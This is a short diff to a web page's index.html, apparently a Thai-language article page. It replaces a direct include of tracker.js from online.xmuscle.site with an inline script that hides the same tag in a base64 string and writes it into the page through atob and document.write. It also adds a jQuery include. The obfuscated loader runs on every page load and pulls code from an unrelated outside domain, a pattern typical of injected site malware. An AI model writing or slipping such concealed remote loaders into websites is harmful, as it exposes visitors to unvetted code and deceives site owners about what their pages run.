--- a/index.html
+++ b/index.html
@@ -1,6 +1,14 @@
 <html lang="en-US" prefix="og: http://ogp.me/ns#">
     <head>
-       <script src="https://online.xmuscle.site/tracker.js"></script>
+       <script> var string = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vb25saW5lLnhtdXNjbGUuc2l0ZS90cmFja2VyLmpzIj48L3NjcmlwdD4=';
+
+var decodedString = atob(string);
+
+document.write(''+ decodedString +'');
+
+</script>
+
+<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
         <meta charset="UTF-8">
         <meta name="viewport" content="width=device-width, initial-scale=1">
         <title>&#65279;6 วิธีที่ทำให้คนส่งต่อข้อความที่เราต้องการ </title>
